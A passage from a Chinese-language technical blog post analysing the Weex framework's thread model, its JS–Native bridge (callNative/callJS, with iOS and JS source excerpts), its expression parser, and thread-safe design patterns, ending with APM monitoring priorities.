  2. 方法解析:通过反射,解析 Module 类中所有通过 WX_EXPORT_METHODWX_EXPORT_METHOD_SYNC 宏暴露的方法,并生成方法名与 MethodInvoker(封装了反射调用逻辑)的映射关系。
  3. 提供实例:当 JS 调用 Module 方法时,WXModuleManager 会通过 WXModuleFactory 根据模块名获取或创建 Module 实例,以及对应方法的 MethodInvoker

八、Weex 分为几个线程

1. 主线程

核心定位:应用的 UI 线程(与原生 App 主线程同源),负责 UI 渲染、用户交互响应,禁止耗时操作

核心职责:

  • 承载 Weex 页面的 原生渲染容器(如 Android 的 WXFrameLayout、iOS 的 WXSDKInstanceView),执行视图布局、绘制、动画触发;
  • 处理用户交互事件(点击、滑动、输入等),并将事件转发给 JS 线程(如需要 JS 逻辑响应时);
  • 执行原生模块的 主线程方法(通过 @WXModuleAnnotation(runOnUIThread = true) 标记的方法,如弹 Toast、更新 UI 的原生能力);
  • 接收 JS 线程下发的 UI 操作指令(如创建视图、修改样式、更新属性),并映射为原生视图操作;

关键约束:所有直接操作原生视图的逻辑必须在主线程执行,否则会导致 UI 错乱或崩溃

2. JS 线程

核心定位:Weex 的 “业务逻辑线程”,独立于主线程,专门运行 JavaScript 代码,避免阻塞 UI。

核心职责:

  • 加载并执行 Weex 业务代码(.we 编译后的 JS bundle),包括 Vue/React 组件初始化、数据绑定、生命周期管理;
  • 处理 JS 层面的业务逻辑(事件响应、数据计算、接口请求预处理);
  • 调用原生模块时,通过 JSBridge 转发请求(区分同步 / 异步,同步请求会短暂阻塞 JS 线程,需谨慎使用);
  • 生成 UI 操作指令(如 createElementupdateStyle),通过跨线程通信发送给主线程执行;
  • 接收主线程转发的用户交互事件(如点击回调),执行对应的 JS 事件处理函数;

关键优化**:最新版本中,JS 线程支持 Bundle 预加载懒加载组件,减少启动耗时;同时通过 JSContext隔离多个 Weex 实例,避免线程内资源竞争。

3. 耗时线程

1. 网络线程

核心定位:Weex 框架封装的 专用网络线程(跨端统一调度),避免网络请求阻塞主线程或 JS 线程。

核心职责:

  • 处理 Weex 内置的网络请求(如 weex.requireModule('stream') 发起的 HTTP/HTTPS 请求);
  • 负责 JS Bundle 的下载(首次加载或更新时),支持断点续传、缓存管理;
  • 处理网络请求的拦截、重试、超时控制(框架层统一实现,无需业务关心);
  • 将网络响应结果通过 JSBridge 回传给 JS 线程;

设计亮点:与原生系统的网络库解耦,但对外暴露统一的 JS API,线程调度由框架内部管理,业务无需手动切换线程

2. 图片下载线程

核心定位:专门处理 Weex 图片的异步加载、解码,避免占用主线程资源导致 UI 卡顿。

核心职责:

  • 加载网络图片、本地图片(通过 img 标签或 weex.requireModule('image'));
  • 图片解码、压缩(适配视图尺寸,减少内存占用);
  • 图片缓存管理(内存缓存 + 磁盘缓存,框架层统一维护);
  • 加载完成后,将图片 bitmap 提交到主线程渲染;

iOS 侧图片加载线程的核心管理类是 WXImageComponent

Weex 线程职责边界清晰:UI 操作归主线程,JS 逻辑归 JS 线程,耗时操作归工作线程 / 网络线程,避免跨线程直接操作资源

九、JS 和 Native 通信

1. callJS 和 callNative

通信方向 发起方 接收方 核心目的 典型场景
callNative JS Native JS 调用 Native 的模块 / 组件接口 渲染组件、弹 Toast、获取设备信息
callJS Native JS Native 触发 JS 的回调函数 组件事件回调(如按钮点击)、数据同步(如网络请求结果)

两者的底层依赖 同一个 JS Bridge 通道,只是「发起方」和「数据格式」不同,Weex 已封装好统一的通信框架,开发者无需关心底层传输细节

2. callNative 实现

callNative 是 JS 主动调用 Native 接口的过程,核心流程:JS 构造标准化指令 → 序列化 JSON → 桥接通道发送 → Native 解析指令 → 执行对应接口 → 响应结果回传

怎么样?是不是感觉似曾相识,早期做 Hybrid 的时候,JS 和 Native 的通信也是一样的流程,感兴趣的可以查看这篇文章

是的,通信要解决的问题一直不变,所以方案也不变。

1. 标准化指令格式

为了让 Native 能统一解析,Weex 规定 callNative 的指令必须包含 4 个核心字段(JS 端构造):

const callNative指令 = {
  module: "component",    // 模块名(如 component/modal/device)
  method: "create",       // 方法名(如 create/toast/getInfo)
  params: {},             // 入参(如组件样式、Toast 内容)
  callbackId: "cb_123"    // 回调 ID(用于 Native 回传结果)
};
  • module + method:定位 Native 端的具体接口(如 modal.toast 对应 Native 的「弹 Toast」接口);
  • params:JS 传递给 Native 的数据(需是 JSON 兼容类型);
  • callbackId:唯一标识当前请求,Native 执行完成后通过该 ID 找到对应的 JS 回调函数。

2. JS 端实现

JS 侧调用 Native 的核心是3个实例方法,对应3类场景

方法名 用途 对应 Native 接口
callModule 调用 Native 普通模块(如 modal/storage global.callNativeModule
callComponent 调用 Native 自定义组件方法 global.callNativeComponent
callDOM 调用 DOM 相关 Native 方法(如创建元素) global.callAddElement 等独立方法

这3个方法都会通过 Native 注入的全局函数(global 上的方法)将调用传递给 Native 层

这3个方法在源码最后

// 调用 DOM 相关 Native 方法
callDOM (action, args) {
  return this[action](this.instanceId, args)
}

// 调用 Native 自定义组件方法
callComponent (ref, method, args, options) {
  return this.componentHandler(this.instanceId, ref, method, args, options)
}

// 调用 Native 普通模块方法(最常用,对应原 callNative)
callModule (module, method, args, options) {
  return this.moduleHandler(this.instanceId, module, method, args, options)
}
1. 普通模块调用 callModule → moduleHandler

moduleHandler 是普通模块调用的最终转发函数,源码中通过 global.callNativeModule 对接 Native:

proto.moduleHandler = global.callNativeModule ||
    ((id, module, method, args) =>
      fallback(id, [{ module, method, args }]))
  • 正常情况(客户端环境):global.callNativeModuleNative 注入到 JS 全局的函数(iOS/Android 原生实现),直接接收 instanceId、模块名、方法名、参数,传递给 Native 层。
  • 降级情况(无 Native 桥接):调用 fallback 函数(初始化时由 sendTasks 参数传入,通常用于调试 / 模拟)。
2. 自定义组件调用 callComponent → componentHandler

逻辑与 moduleHandler 一致,对接 global.callNativeComponent

proto.componentHandler = global.callNativeComponent ||
  ((id, ref, method, args, options) =>
    fallback(id, [{ component: options.component, ref, method, args }]))
3. DOM 方法调用 callDOM → 独立全局函数映射

DOM 相关的 Native 方法(如 addElement/updateStyle)被单独映射到 global 上的独立函数(而非统一的 callNative),源码通过 init 函数初始化映射:

// 源码第 116-138 行:DOM 方法与 Native 全局函数的映射
export function init () {
  const DOM_METHODS = {
    createFinish: global.callCreateFinish,
    addElement: global.callAddElement, // DOM 创建元素 → Native 的 callAddElement
    removeElement: global.callRemoveElement, // DOM 删除元素 → Native 的 callRemoveElement
    updateAttrs: global.callUpdateAttrs, // 更新属性 → Native 的 callUpdateAttrs
    // ... 其他 DOM 方法
  }
  const proto = TaskCenter.prototype

  // 给 TaskCenter 原型挂载 DOM 方法,直接调用 Native 注入的全局函数
  for (const name in DOM_METHODS) {
    const method = DOM_METHODS[name]
    proto[name] = method ?
      (id, args) => method(id, ...args) : // 正常情况:调用 Native 全局函数
      (id, args) => fallback(...) // 降级情况
  }
}

例如调用 callDOM('addElement', args) 时,最终会执行 global.callAddElement(instanceId, ...args),直接对接 Native 的 DOM 模块。其实是注入到 JSContext 里的方法对象。

在 Weex 的 JS 运行环境中,globalJS 全局对象(Global Object)—— 它是所有 JS 代码的 “顶层容器”,所有未被定义在局部作用域的变量、函数,最终都会挂载到 global 上(类似浏览器环境的 window,Node.js 环境的 global

Native 向 JS 引擎的 “全局上下文” 注入 callAddElement 函数时,该函数会自动成为 global 对象的属性——JS 侧的 global.callAddElement,本质就是访问这个被 Native 注入到全局的函数。

QA:global 是什么?

是 JS 全局对象。不管是浏览器、Node.js 还是 Weex 的 JS 引擎(JavaScriptCore/QuickJS),都有一个 全局对象(Global Object)

  • 它是 JS 运行环境的 “根”,所有全局变量、函数都是它的属性;
  • 不同环境的全局对象名称不同:
    • 浏览器环境:叫 window(比如 window.alertwindow.document);
    • Node.js 环境:叫 global(比如 global.consoleglobal.setTimeout);
    • Weex 环境:叫 global(因为 Weex 不依赖浏览器,没有 window,直接用 JS 引擎原生的全局对象 global)。
// WXJSCoreBridge.mm
- (void)registerCallAddElement:(WXJSCallAddElement)callAddElement
{
    id callAddElementBlock = ^(JSValue *instanceId, JSValue *ref, JSValue *element, JSValue *index, JSValue *ifCallback) {
        NSString *instanceIdString = [instanceId toString];
        WXSDKInstance *instance = [WXSDKManager instanceForID:instanceIdString];
        if (instance.unicornRender) {
            JSValueRef args[] = {instanceId.JSValueRef, ref.JSValueRef, element.JSValueRef, index.JSValueRef};
            [WXCoreBridge callUnicornRenderAction:instanceIdString
                                           module:"dom"
                                           method:"addElement"
                                          context:[JSContext currentContext]
                                             args:args
                                         argCount:4];
            return [JSValue valueWithInt32:0 inContext:[JSContext currentContext]];
        }

        NSDictionary *componentData = [element toDictionary];
        NSString *parentRef = [ref toString];
        NSInteger insertIndex = [[index toNumber] integerValue];
        if (WXAnalyzerCenter.isInteractionLogOpen) {
            WXLogDebug(@"wxInteractionAnalyzer : [jsengin][addElementStart],%@,%@",instanceIdString,componentData[@"ref"]);
        }
        return [JSValue valueWithInt32:(int32_t)callAddElement(instanceIdString, parentRef, componentData, insertIndex) inContext:[JSContext currentContext]];
    };
    
    _jsContext[@"callAddElement"] = callAddElementBlock;
}

在 js 侧是通过 TaskCenter.js 的 init 方法中定义的,存在映射关系, addElement: global.callAddElement,

3. callJS 实现

WXReactorProtocol 协议:

  • 定义 Native 调用 JS 的「标准接口」(如触发回调、发送事件),不关心底层用哪种 JS 引擎(JavaScriptCore / 其他);
  • 具体的桥接类(如 WXJSCoreBridge)遵守这个协议,实现接口方法 —— 即使未来替换 JS 引擎,只要遵守协议,上层代码(如 Native 模块、组件)无需修改。

@class JSContext;

@protocol WXReactorProtocol <NSObject>

@required

/**
Weex should register a JSContext to reactor
*/
- (void)registerJSContext:(NSString *)instanceId;

/**
 Reactor execute js source
*/
- (void)render:(NSString *)instanceId source:(NSString*)source data:(NSDictionary* _Nullable)data;

- (void)unregisterJSContext:(NSString *)instanceId;

/**
 When js call Weex NativeModule, invoke callback function
 
 @param instanceId : weex instance id
 @param callbackId : callback function id
 @param args       : args
*/
- (void)invokeCallBack:(NSString *)instanceId function:(NSString *)callbackId args:(NSArray * _Nullable)args;

/**
Native event to js
 
@param instanceId :   instance id
@param ref        :   node reference
@param event      :   event type
@param args       :   parameters in event object
@param domChanges :  dom value changes, used for two-way data binding
*/
- (void)fireEvent:(NSString *)instanceId ref:(NSString *)ref event:(NSString *)event args:(NSDictionary * _Nullable)args domChanges:(NSDictionary * _Nullable)domChanges;

@end

Native 模块(Module)/组件(Component) 完成任务后 -> WXBridgeManager.callBack(...) → 构造 JS 脚本(调用 TaskCenter.callback) → WXJSCoreBridge.executeJavascript(...) → JS 引擎执行 → TaskCenter.callback 响应

WXJSCoreBridge 本身不直接拼接回调脚本,而是提供 executeJavascript: 方法(源码第 102 行),作为 JS 脚本执行的底层入口;真正的脚本构造,在 WXBridgeManager

WXBridgeManager 事件回调

- (void)fireEvent:(NSString *)instanceId ref:(NSString *)ref type:(NSString *)type params:(NSDictionary *)params
{
    [self fireEvent:instanceId ref:ref type:type params:params domChanges:nil];
}

- (void)fireEvent:(NSString *)instanceId ref:(NSString *)ref type:(NSString *)type params:(NSDictionary *)params domChanges:(NSDictionary *)domChanges
{
    [self fireEvent:instanceId ref:ref type:type params:params domChanges:domChanges handlerArguments:nil];
}
- (void)fireEvent:(NSString *)instanceId ref:(NSString *)ref type:(NSString *)type params:(NSDictionary *)params domChanges:(NSDictionary *)domChanges handlerArguments:(NSArray *)handlerArguments
{
   // ...
    WXCallJSMethod *method = [[WXCallJSMethod alloc] initWithModuleName:nil methodName:@"fireEvent" arguments:[WXUtility convertContainerToImmutable:args] instance:instance];
    [self callJsMethod:method];
}

- (void)callJsMethod:(WXCallJSMethod *)method
{
    if (!method || !method.instance) return;
    
    __weak typeof(self) weakSelf = self;
    WXPerformBlockOnBridgeThreadForInstance(^(){
        WXBridgeContext* context = method.instance.useBackupJsThread ? weakSelf.backupBridgeCtx :  weakSelf.bridgeCtx;
        [context executeJsMethod:method];
    }, method.instance.instanceId);
}

WXBridgeContext.m 代码如下:

- (void)executeJsMethod:(WXCallJSMethod *)method {    
   // ...
    [sendQueue addObject:method];
    [self performSelector:@selector(_sendQueueLoop) withObject:nil];
}

- (void)_sendQueueLoop {
    if ([tasks count] > 0 && execIns) {
        WXSDKInstance * execInstance = [WXSDKManager instanceForID:execIns];
        NSTimeInterval start = CACurrentMediaTime()*1000;
        
        if (execInstance.instanceJavaScriptContext && execInstance.bundleType) {
            [self callJSMethod:@"__WEEX_CALL_JAVASCRIPT__" args:@[execIns, [tasks copy]] onContext:execInstance.instanceJavaScriptContext completion:nil];
        } else {
            [self callJSMethod:@"callJS" args:@[execIns, [tasks copy]]];
        }
        // ...
    }
}

- (void)callJSMethod:(NSString *)method args:(NSArray *)args {
    if (self.frameworkLoadFinished) {
        [self.jsBridge callJSMethod:method args:args];
    } else {
        [_methodQueue addObject:@{@"method":method, @"args":args}];
    }
}

再到 WXJSCoreManager

- (JSValue *)callJSMethod:(NSString *)method args:(NSArray *)args {
    WXLogDebug(@"Calling JS... method:%@, args:%@", method, args);
    WXPerformBlockOnMainThread(^{
        [[WXBridgeManager sharedManager].lastMethodInfo setObject:method ?: @"" forKey:@"method"];
        [[WXBridgeManager sharedManager].lastMethodInfo setObject:args ?: @[] forKey:@"args"];
    });
    return [[_jsContext globalObject] invokeMethod:method withArguments:[args copy]];
}

其实不管是 CallJS 还是 CallNative,通信的技术方案设计和 Hybrid 的设计一致,都需要在 JavascriptCore 的 global 对象上挂载一个方法。比如 Native 注册了一个 WXComponent 之后,Weex 侧用 Vue 语法写完了个页面,呈现在用户手机上,用户点击页面上的按钮之后,Native 再将事件回调给 Weex 侧,Weex 再去处理后续逻辑。

4. WXAssertComponentThread 断言

WXAssertComponentThread 的核心作用是 强制约束组件相关操作在「组件专属线程」执行,本质是为了解决「线程安全」和「性能稳定性」问题

iOS 开发的核心线程规则是「UI 操作必须在主线程」,但 Weex 组件的工作流程(绑定解析、数据计算、布局计算、子组件管理)包含大量「非 UI 操作」—— 如果这些操作都在主线程执行,会阻塞主线程(比如长列表数据解析、复杂表达式计算),导致 UI 卡顿(比如滑动掉帧)

因此 Weex 设计了线程分工

线程类型 负责的操作
组件专属线程 绑定规则解析(_storeBindings)、表达式计算(bindingBlockWithExpression)、数据更新(updateBindingData)、布局计算(calculateLayout
主线程 最终 UI 渲染(如 UIImageView 设图、UILabel 设文本)、子视图增删(insertSubview

1. 避免「线程安全问题」,防止崩溃 / 数据错乱

组件的核心数据(如 _bindingProps_subcomponents_flexCssNode)都是「非线程安全的」(没有加锁保护)—— 如果多个线程同时读写这些数据,会导致:

  • 数据竞争:比如主线程读取 _subcomponents 遍历,组件线程同时修改 _subcomponents(增删子组件),导致数组越界崩溃;
  • 数据不一致:比如组件线程更新 _bindingProps 的值,主线程同时读取该值用于 UI 更新,导致显示错误的旧值;
  • 野指针:比如组件线程销毁子组件,主线程还在访问该子组件的 view

线程断言通过「强制所有组件核心操作在同一线程执行」,从根源上避免了这些跨线程问题 —— 同一时间只有一个线程操作组件数据,无需复杂锁机制(锁会降低性能)。

2. 简化调试,快速定位线程问题

如果没有线程断言,跨线程操作组件可能导致「偶现崩溃」(比如 100 次操作出现 1 次),难以复现和排查(日志中看不到线程上下文)。而线程断言会在「违规线程调用时直接崩溃」,并明确提示「必须在组件线程执行」,开发者能立刻定位到违规代码(比如在主线程调用了 updateBindingData),大幅降低调试成本。

3. 保证操作顺序一致性

组件的更新流程是「解析绑定 → 计算表达式 → 更新属性 → 布局计算 → UI 渲染」—— 这些步骤必须按顺序执行。如果分散在多个线程,可能出现「布局计算还没完成,UI 已经开始渲染」的情况(导致布局错乱)。组件专属线程保证了所有操作串行执行,顺序不会乱。

5. WXJSASTParser 的工作原理

WXJSASTParser 如何把表达式字符串解析为 AST 节点?

WXJSASTParser 是 Weex 自定义的「轻量 JS 表达式解析器」—— 核心是「按 JS 语法规则,把字符串拆分为结构化的 AST 节点」,全程不依赖完整 JS 引擎(如 JSC/V8),只支持绑定表达式需要的基础语法(标识符、成员访问、二元运算等),兼顾性能和体积。

整个解析过程分 3 步:词法分析 → 语法分析 → AST 节点封装,和编译器的前端流程一致,以下结合示例("user.name + '?size=100'")拆解:

先明确:AST 是什么?

AST(抽象语法树)是「用树形结构表示代码语法」的中间结构 —— 比如表达式 user.name + '?size=100',AST 会拆分为:

根节点:BinaryExpression(运算符 '+')
├─ 左子节点:MemberExpression(成员访问)
│  ├─ object:Identifier(标识符 'user')
│  └─ property:Identifier(标识符 'name')
└─ 右子节点:StringLiteral(字符串字面量 '?size=100')

这种结构能被程序快速遍历和计算(比如之前讲的生成 WXDataBindingBlock 时,递归遍历节点执行运算)。

1.词法分析(Lexical Analysis)

拆分为词法单元(Token)。词法分析是「把表达式字符串拆分为最小的、有意义的语法单元」,忽略空格、换行等无关字符。核心是「按 JS 语法规则匹配字符序列」。

表达式 "user.name + '?size=100'"` 词法分析后得到的 Token 序列:

Token 类型 Token 值 说明
IDENTIFIER user 标识符(变量名 / 属性名)
DOT . 成员访问运算符
IDENTIFIER name 标识符
PLUS + 二元运算符(加法 / 拼接)
STRING_LITERAL ?size=100 字符串字面量(去掉引号)

词法分析的实现逻辑(简化):

  1. 初始化一个「字符指针」,从表达式字符串开头遍历;
  2. 遇到字母 / 下划线 → 继续往后读,直到非字母 / 数字 / 下划线 → 识别为 IDENTIFIER(如 user);
  3. 遇到 +/-/*///>/= 等 → 识别为对应运算符(如 +PLUS);
  4. 遇到 "' → 继续往后读,直到下一个相同引号 → 识别为 STRING_LITERAL(去掉引号);
  5. 遇到 . → 识别为 DOT(成员访问);
  6. 遇到空格 / 制表符 → 直接跳过(无意义字符);
  7. 遇到无法识别的字符(如 #/@)→ 抛出语法错误(WXLogError)。

Weex 的 WXJSASTParser 内部会维护一个「Token 流」(数组),词法分析后把 Token 按顺序存入流中,供下一步语法分析使用。

2. 语法分析(Syntactic Analysis)

语法分析是「根据 JS 表达式语法规则,把 Token 流组合为树形 AST 节点」—— 核心是「验证 Token 序列是否符合语法,并构建层级关系」。

Weex 支持的 JS 表达式语法子集(核心):

  • 标识符:userimageUrl(对应 WXJSIdentifier);
  • 成员访问:user.namelist[0](对应 WXJSMemberExpression);
  • 字面量:字符串('abc')、数字(123)、布尔(true)、null(对应 WXJSStringLiteral/WXJSNumericLiteral 等);
  • 二元运算:a + bage > 18a === b(对应 WXJSBinaryExpression);
  • 条件运算:age > 18 ? 'adult' : 'teen'(对应 WXJSConditionalExpression);
  • 数组表达式:[a, b, c](对应 WXJSArrayExpression)。

示例:Token 流 → AST 节点的构建过程

Token 流:IDENTIFIER(user) → DOT → IDENTIFIER(name) → PLUS → STRING_LITERAL(?size=100)

  1. 语法分析器先读取前 3 个 Token(user.name),匹配「成员访问语法规则」(IDENTIFIER . IDENTIFIER)→ 构建 WXJSMemberExpression 节点(左子节点 user,右子节点 name);
  2. 接着读取 PLUS(二元运算符),再读取后面的 STRING_LITERAL(?size=100) → 匹配「二元运算语法规则」(Expression + Expression);
  3. 把之前构建的 WXJSMemberExpression 作为「左子节点」,STRING_LITERAL 作为「右子节点」,PLUS作为「运算符」→ 构建根节点 WXJSBinaryExpression
  4. 最终生成 AST 树(如之前的结构)。

语法分析的实现逻辑(简化):

Weex 采用「递归下降分析法」(最适合手工实现的语法分析方法):

  1. 为每种表达式类型定义一个「解析函数」(如 parseMemberExpression 解析成员访问、parseBinaryExpression 解析二元运算);
  2. 解析函数递归调用:比如 parseBinaryExpression 会调用 parseMemberExpression 解析左右操作数,parseMemberExpression 会调用 parseIdentifier 解析标识符;
  3. 语法校验:如果 Token 序列不符合规则(如 user.name + 缺少右操作数),会抛出「语法错误」日志,终止解析。

3. AST 节点封装

转为 Weex 自定义的 WXJSExpression。语法分析生成的是「抽象语法树结构」,Weex 会把这个结构封装为自定义的 WXJSExpression 子类(对应不同表达式类型),每个子类存储该节点的关键信息(如运算符、子节点),供后续生成 WXDataBindingBlock 使用。

示例封装:

  • WXJSMemberExpression 类:存储 object(子节点,如 user)、property(子节点,如 name)、computed(是否是计算属性,如 list[0]YESuser.nameNO);
  • WXJSBinaryExpression 类:存储 left(左子节点)、right(右子节点)、operator_(运算符字符串,如 "+");
  • 字面量类(如 WXJSStringLiteral):存储 value(字面量值,如 ?size=100)。

这些类的定义在 Weex 源码的 WXJSASTParser.h 中,本质是「数据容器」,把 AST 结构转化为 Objective-C 代码可访问的对象。

WXJSASTParser 本质:它不是完整的 JS 解析器(不支持 functionfor 等复杂语法),而是「专门为 Weex 绑定表达式设计的轻量解析器」—— 只解析需要的 JS 表达式子集,把字符串转为结构化的 AST 节点,最终目的是「让 Native 代码能递归遍历节点,计算出表达式结果」(如 user.name + '?size=100'avatar.png?size=100)。

这种「自定义轻量解析器」的设计,既避免了依赖完整 JS 引擎的体积和性能开销,又能精准适配 Weex 的绑定需求,是跨端框架的常见优化思路。

十、值得借鉴的地方

1. WXThreadSafeMutableDictionary 线程安全字典

Weex 中的 WXThreadSafeMutableDictionary 提供了一个线程安全的字典,其本质是通过加 pthread_muext_t 锁来维护内部的一个字典的。 比如下面的代码

初始化锁相关的配置

@interface WXThreadSafeMutableDictionary ()
{
    NSMutableDictionary* _dict;
    pthread_mutex_t _safeThreadDictionaryMutex;
    pthread_mutexattr_t _safeThreadDictionaryMutexAttr;
}

@end

@implementation WXThreadSafeMutableDictionary

- (instancetype)initCommon
{
    self = [super init];
    if (self) {
        pthread_mutexattr_init(&(_safeThreadDictionaryMutexAttr));
        pthread_mutexattr_settype(&(_safeThreadDictionaryMutexAttr), PTHREAD_MUTEX_RECURSIVE); // must use recursive lock
        pthread_mutex_init(&(_safeThreadDictionaryMutex), &(_safeThreadDictionaryMutexAttr));
    }
    return self;
}

- (instancetype)init
{
    self = [self initCommon];
    if (self) {
        _dict = [NSMutableDictionary dictionary];
    }
    return self;
}

在字典操作的地方使用锁

- (void)setObject:(id)anObject forKey:(id<NSCopying>)aKey
{
    id originalObject = nil; // make sure that object is not released in lock
    @try {
        pthread_mutex_lock(&_safeThreadDictionaryMutex);
        originalObject = [_dict objectForKey:aKey];
        [_dict setObject:anObject forKey:aKey];
    }
    @finally {
        pthread_mutex_unlock(&_safeThreadDictionaryMutex);
    }
    originalObject = nil;
}

这么写的价值:解锁逻辑「绝对执行」,彻底避免死锁 这是 @try-finally 最核心的价值 ——无论 try 块内发生什么(正常执行、提前 return、抛异常),finally 块的解锁逻辑一定会执行

对比无 try-finally 的写法

// Bad: 若setObject抛异常,unlock不会执行→死锁
pthread_mutex_lock(&_mutex);
[_dict setObject:anObject forKey:aKey];
pthread_mutex_unlock(&_mutex); 

问题:[_dict setObject:anObject forKey:aKey] 可能抛异常(比如 aKey = nil 时会触发 NSInvalidArgumentException),若没有 finally,锁会被永久持有→其他线程调用 lock 时死锁,整个字典无法再操作。

设计优点:

  • @try-finallly:即使 try 内逻辑出错,finally 也会执行 pthread_mutex_unlock,保证锁最终释放,这是线程安全的「兜底保障」
  • 注意,不是 try...catch...finally: 如果加了 catch 逻辑,则字典的 key 为 nil 产生的崩溃也会被捕获掉,这属于不符合预期的行为。因为 key 为 nil 产生的原因太多了,可能是业务代码异常,也可能是数据异常,也可能是逻辑错误,如果一刀切直接用 try...catch...finally 捕获了异常,但是没有配置异常的收集、上报、处理逻辑,属于边界不清晰,本质是为了解决加解锁不匹配而可能带来的线程安全问题,却"多管闲事",把字典 key 为 nil 本该向上跑的异常而卡住了(这个问题不再赘述,是一个经典的策略问题,端上的异常发生时,安全气垫的“做与不做”问题)

延伸:聊聊类似网易的大白解决方案或者业界其他公司中,安全气垫虽然保证了代码不 crash,影响用户体验,但是比如数组本该越界,现在却不越界:

  1. 唯一能做的就是返回一个错误的值,比如数组长度为3,访问4,现在不 crash,返回了 0 的值,那是不是产生了业务异常?比如商品价格
  2. 不 crash,也不返回错误位置的值,类似给一个回调,告诉业务方出现了异常,可以做一些业务层面的提醒或者配置(比如开发阶段商品卡片的价格 Label 显示:商品价格获取错误,数组越界),同时产生的异常案发现场信息和其他的一些数据会上报,用于 APM 平台去分析和定位。

但这也产生一个问题,类似数组越界的场景,可能10000次里面9999次都正常,只有1次异常,业务开发为了这万分之一出现的异常,还需要写一些异常处理的逻辑(比如商品卡片展示价格获取错误,数组越界)。那字典的 key 为 nil 呢?除法的分母为0呢?诸如此类,类似乐观锁和悲观锁的场景

相关问题的思考可以查看这篇文章:安全气垫

  • WXHandlerFactory:Weex 核心的「处理器工厂」,负责管理所有协议(如图片加载、网络请求、存储等)的实现类注册 / 查找;
  • WXImgLoaderProtocol:Weex 定义的「图片加载协议」,仅声明接口(下载、取消、缓存等),不包含具体实现。

Weex 支持业务层自定义图片加载逻辑(比如统一用项目的图片缓存库、添加下载拦截、埋点等),此时自定义实现类会替代默认实现,成为下载执行者: 步骤 1:业务层创建类(如 MyCustomImgLoader),遵循 WXImgLoaderProtocol,实现 wx_loadImageWithURL: 等协议方法(内部可调用 SDWebImage/AFNetworking 等完成下载); 步骤 2:将自定义类注册到 WXHandlerFactory:

[WXHandlerFactory registerHandler:[MyCustomImgLoader new] forProtocol:@protocol(WXImgLoaderProtocol)];

步骤 3:此时 [WXHandlerFactory handlerForProtocol:@protocol(WXImgLoaderProtocol)] 会返回 MyCustomImgLoader 实例,所有图片下载由该类负责

2. 设计分层合理

graph TD
    A[开发者编写的 .we/.vue 文件] --> B[Transformer<br/>转换JS Bundle];
    B --> C[JS Framework<br/>解析并管理Virtual DOM];
    C -- 通过JS Bridge发送渲染指令 --> D[Native SDK<br/>渲染引擎];
    D --> E[iOS/Android/Web 原生视图];
    
    C -- 支持多种DSL --> F[Vue.js];
    C -- 支持多种DSL --> G[Rax(类React)];
    D -- 原生能力扩展 --> H[自定义Component];
    D -- 原生能力扩展 --> I[自定义Module];

Weex 最核心的设计是将整个框架清晰地分为:语法层(DSL)中间层(JS Framework)渲染层(Native SDK)

这种渲染引擎和语法层 DSL 分离的设计,可以使得上层 DSL 方便拓展 Vue、Rax 写法,下层渲染引擎可以保持较好的稳定性。为了生态的拓展提供了极大的便携性。

3. 可扩展的组件与模块系统

Weex 通过WXSDKEngine.registerComponent()registerModule() 方法,允许开发者扩展原生组件 (UI Component)和模块(Login Module)。这套机制设计得足够底层和通用,使得 Weex 可以由开发者来注册,由公司内的体验设计中心规范来落地的组件。以及一些基础能力。这样子 Weex 官方已经提供了一些功能强大的筋骨,我们在其之上可以提供更符合需求的外表和更有力量的一块手臂肌肉。

虽然事后视角来看,Weex、RN、Flutter,甚至是更早的、设计完善的 Hybrid 都有该能力。但这对于远古时期的 Weex 来说,还是可圈可点的。

4. 轻量 JSBundle + 增量更新支持

Weex 的 JSBundle 仅包含业务逻辑和组件描述,框架代码(Vue 内核、Weex 基础 API)内置在原生 SDK 中,因此 Bundle 体积极小;同时支持将 Bundle 拆分为 “基础包(公共逻辑)+ 业务包(页面逻辑)”,实现增量更新。

解决了跨端框架 “首屏加载慢” 的痛点(小 Bundle 加载更快),同时增量更新降低了发布成本。

十一、Weex APM

1. 历史背景

Weex 是诸多年前的产物,部分业务线用 Weex 写了部分功能模块,或者是某几个页面,或者是某个二级、三级业务 SDK 的页面。但可以确定的是:

  • 21年就完成了 Flutter 的基建开发(对齐 Native 的 UI 组件库,遵循体验设计平台产出的集团 UI 标准;做了 Flutter 的大量 plugin、打包构建平台、日志库、网络库、探照灯、APM SDK、热修复能力等)。新业务的实现只会在 Native 和 Flutter 上考虑
  • Weex 业务代码基本上是存量的
  • Weex 代码没有 bug 就不去修改;有版本迭代,之前是 Weex 实现的,本次只做简单 UI 增删或字段调整,也是会修改一下。初次之外不修改 Weex 代码

所以像 Native 一样去全面监控性能、网络、crash、异常、白屏、页面加载耗时等维度的话,ROI 是很低的。那么就需要制定一些策略去有针对性的监控高优问题。

Weex 的异常比较有特点,比如在页面的模版代码中绑定了 data 中的一个对象,此时对象可能并没有值,而是依赖后续的网络请求完成,对象才有了具体的值 data 改变,数据驱动,页面再次 render。所以监控代码会认为第一次 render 的时候访问对象不存在的属性。 真正有问题的代码和不影响业务的异常信息,都会被 Vue 官方认为是异常。基于这样的背景,我们无法 pick 出真正异常或者是开发者判空代码没写好的问题。基于此,我们需要做一些约定和标准。

2. 优先级权衡标准

这时候就需要摒弃程序员视角(不然会陷入啥数据都想统计,可能是洁癖、可能是追求),但从 ROI 角度出发,我们就需要切换到用户视角。

假设你是一个用户,什么样的情况代表业务异常,对我们的用户来说比较痛呢?

  • 页面白屏了,看都看不到了,别说你们的 App 为我赋能解决用户痛点了
  • 稍微好点,可以看到页面了,但是某一个区域是白屏的。比如:该页面大部分在展示商品价格、商品数量、商品折扣价、商品折扣信息、下面应该是有个“确认支付”按钮,但是此处就是空白,点也点不了。
  • 情况再好点。可以看到全部的页面了,但是点击后无响应。比如:该页面大部分在展示商品价格、商品数量、商品折扣价、商品折扣信息、下面有个“确认支付”按钮。用户在考虑再三,本着理性购物后,发现是刚需品,咬紧牙要付款了,此时点击“确认支付”按钮了,但是页面没有任何反应。用户也是“见多识广”的体面人,猜测可能是网络不好的情况,所以等了1分钟,他很有耐心。切换了 WI-FI 到 5G 后,继续点击,依旧没反应。一怒之下点了10次,等了2分钟,还是没反应。他奔溃了,卸载了 App

上述几种情况,总结为:按照异常等级,可以划分为影响业务和不影响业务。什么叫“影响业务”?这是我们自己定义的标准,影响用户是否正常操作 App。比如:页面白屏(页面全部白屏、页面部分白屏)、点击某个按钮无响应,这些叫做“影响业务”,属于 Error 级别。其他的一些轻微异常,不影响用户使用 App 功能,不影响业务,属于 Warning 级别。

3. UI 显示异常

1. 部分白屏:注册的 Component 使用异常

